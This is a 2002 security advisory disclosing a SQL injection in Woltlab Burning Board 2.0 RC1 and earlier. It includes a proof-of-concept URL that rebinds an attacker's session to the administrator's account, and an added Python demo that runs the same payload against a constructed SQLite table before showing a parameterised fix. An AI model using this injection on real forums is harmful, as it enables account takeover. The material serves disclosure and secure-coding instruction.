Subject: sql injection vulnerability in WBB 2.0 RC1 and below
Date: Sep 8 2002 1:56PM
Author: Cano2 <Cano2@buhaboard.de>

   Hi,
   I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1
   and below some weeks ago. The latest version (WBB 2.0 RC 2) does not
   seem vulnerable, but there are still sites running vulnerable versions.

   [versions tested vulnerable]
   WBB 2.0 RC 1
   WBB 2.0 beta 5
   WBB 2.0 beta 4
   WBB 2.0 beta 3

   [description]
   It allows any user (even guests, depending on the board's
   configuration) to compromise every other account (including the
   Administrator's). It is caused by a variable containing unchecked user
   input in board.php, which can be used for a SQL injection attack.

   The query looks similar to the following:

   UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx',
   request_uri = '$HTTP_REQUEST_URI', boardid = '$boardid',
   threadid = 'xx' WHERE hash = '$sid'

   Because the content of $boardid is not checked, it is possible to close
   the quoted value early and overwrite other fields of the same row.

   [proof of concept]
   board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is
   usually an admin]&sid=[attackers session-id]

   The executed query now looks like that:

   UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx',
   request_uri = 'board.php?boardid=[boardid]%27,%20userid=%27[victims userid, 1 is
   usually an admin]&sid=[session-id]',
   boardid = '[boardid]', userid='[victims userid, 1 is usually an admin]',
   threadid = 'xx' WHERE hash = '$sid'

   As you can see, the userid stored in the attacker's session is
   overwritten with the victim's, so the attacker's session now belongs to
   the victim's account.

   [solution]
   Update to the latest version (WBB 2.0 RC 2) or check every variable
   that may contain user input before it reaches a query.

   e.g.

   $boardid = mysql_escape_string($boardid);
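The following Python script is an added illustration and is not code from this advisory or from Woltlab. It rebuilds the session UPDATE from the description above against an in-memory SQLite table (the table layout, session hashes and userids are constructed; SQLite has no LOW_PRIORITY, so that keyword is dropped) and shows the vulnerable string-spliced query next to a hardened form. The hardened form goes one step beyond the mysql_escape_string() fix suggested above: since boardid is a numeric field, it is cast to an integer and every value is passed as a bound parameter, so a quote in the input cannot change the statement at all.

```python
import sqlite3

# Constructed schema approximating bb1_sessions; only the columns named in the
# advisory's query plus userid are modelled, everything else is an assumption.
SCHEMA = """
CREATE TABLE bb1_sessions (
    hash         TEXT PRIMARY KEY,
    userid       INTEGER NOT NULL,
    lastactivity TEXT,
    request_uri  TEXT,
    boardid      INTEGER,
    threadid     INTEGER
);
"""


def make_db():
    """In-memory stand-in for the board database with two constructed sessions."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO bb1_sessions VALUES (?, ?, 'xxx', '', 0, 0)",
        [("attacker-sid", 5), ("victim-sid", 1)],
    )
    return conn


def update_session_vulnerable(conn, sid, boardid, request_uri):
    """Mirrors the advisory's query: $boardid is spliced into the SQL unchecked.
    Returns the statement text so the effect of a quote in boardid is visible."""
    query = (
        "UPDATE bb1_sessions SET lastactivity = 'xxx', request_uri = '%s', "
        "boardid = '%s', threadid = '0' WHERE hash = '%s'"
        % (request_uri, boardid, sid)
    )
    conn.execute(query)
    conn.commit()
    return query


def update_session_safe(conn, sid, boardid, request_uri):
    """Hardened form: boardid must parse as an integer, and all values are bound
    parameters rather than part of the statement text."""
    try:
        boardid_int = int(boardid)
    except (TypeError, ValueError):
        raise ValueError("boardid must be numeric, got %r" % (boardid,))
    conn.execute(
        "UPDATE bb1_sessions SET lastactivity = 'xxx', request_uri = ?, "
        "boardid = ?, threadid = 0 WHERE hash = ?",
        (request_uri, boardid_int, sid),
    )
    conn.commit()


def session_userid(conn, sid):
    """Which account the given session currently belongs to."""
    row = conn.execute(
        "SELECT userid FROM bb1_sessions WHERE hash = ?", (sid,)
    ).fetchone()
    return row[0] if row else None


# Constructed request with the same shape as the advisory's proof of concept:
# the boardid value closes its quote and appends a second assignment.
PAYLOAD_BOARDID = "3', userid='1"
PAYLOAD_URI = "board.php?boardid=3%27,%20userid=%271&sid=attacker-sid"


def demo_vulnerable():
    """Unchecked boardid: the attacker's session is re-bound to userid 1."""
    conn = make_db()
    update_session_vulnerable(conn, "attacker-sid", PAYLOAD_BOARDID, PAYLOAD_URI)
    return session_userid(conn, "attacker-sid")


def demo_safe():
    """Integer cast rejects the request; the session keeps userid 5."""
    conn = make_db()
    try:
        update_session_safe(conn, "attacker-sid", PAYLOAD_BOARDID, PAYLOAD_URI)
    except ValueError:
        pass  # request rejected before any SQL runs
    return session_userid(conn, "attacker-sid")


def demo_safe_benign():
    """A normal numeric boardid still works with the hardened query."""
    conn = make_db()
    update_session_safe(conn, "attacker-sid", "3", PAYLOAD_URI)
    boardid = conn.execute(
        "SELECT boardid FROM bb1_sessions WHERE hash = ?", ("attacker-sid",)
    ).fetchone()[0]
    return session_userid(conn, "attacker-sid"), boardid


if __name__ == "__main__":
    print("vulnerable ->", demo_vulnerable())
    print("hardened   ->", demo_safe())
    print("benign     ->", demo_safe_benign())
```

The point of the integer cast is that escaping alone only neutralises quote characters; for a field that is by definition a number, rejecting anything that is not a number is the simpler and stronger check, and bound parameters remove the need to reason about escaping for the remaining string fields such as request_uri.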

   [vendor status]
   29.7.02 contacted Woltlab
   12.8.02 release of WBB 2.0 RC 2 (does not seem vulnerable)

   I didn't get an answer from Woltlab until now.